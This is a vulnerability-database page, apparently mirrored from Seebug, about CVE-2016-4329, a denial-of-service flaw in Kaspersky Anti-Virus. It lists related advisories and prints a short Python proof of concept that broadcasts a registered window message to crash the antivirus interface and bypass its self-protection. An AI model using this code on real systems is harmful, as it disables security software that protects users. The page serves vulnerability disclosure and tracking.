Lucene search
K

Kaspersky Anti-Virus Unhandled Windows Messages Denial of Service Vulnerability(CVE-2016-4329)

🗓️ 13 Oct 2017 00:00:00Reported by RootType 
seebug
 seebug
🔗 www.seebug.org👁 63 Views

A local denial of service vulnerability is found in Kaspersky Anti-Virus software. Sending unhandled window messages can cause application termination and bypass KAV self-protection mechanism

Related
Code
ReporterTitlePublishedViews
Family
CNVD
Local Denial of Service Vulnerability in Multiple Kaspersky Products
7 Sep 201600:00
cnvd
CVE
CVE-2016-4329
6 Jan 201721:00
cve
Cvelist
CVE-2016-4329
6 Jan 201721:00
cvelist
EUVD
EUVD-2016-5329
7 Oct 202500:30
euvd
Kaspersky
KLA10947 Denial of service vulnerability in Kaspersky products
6 Jan 201700:00
kaspersky
NVD
CVE-2016-4329
6 Jan 201721:59
nvd
OpenVAS
Kaspersky Anti-Virus < 17.0.0.611 Multiple Vulnerabilities
23 Jan 201700:00
openvas
OpenVAS
Kaspersky Total Security < 17.0.0.611 Multiple Vulnerabilities
23 Jan 201700:00
openvas
OpenVAS
Kaspersky Internet Security < 17.0.0.611 Multiple Vulnerabilities
23 Jan 201700:00
openvas
OSV
CVE-2016-4329
6 Jan 201721:59
osv
Rows per page

                                                import win32con
import win32api

messageName = "Kaspersky Anti-Virus"

def crash_avpui():
    msgID  = win32api.RegisterWindowMessage(messageName)
    wParam = 8 # one of crashing IDs
    lParam = 0
    print "[+] Sending message : Msg : 0x%x      wParam : 0x%x" % (msgID,wParam)
    win32api.PostMessage(win32con.HWND_BROADCAST,msgID,wParam,lParam)
    print "[+] Message sent"

if __name__ == "__main__":
    crash_avpui()
                              

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

13 Oct 2017 00:00Current
5.7Medium risk
Vulners AI Score5.7
EPSS0.00053
63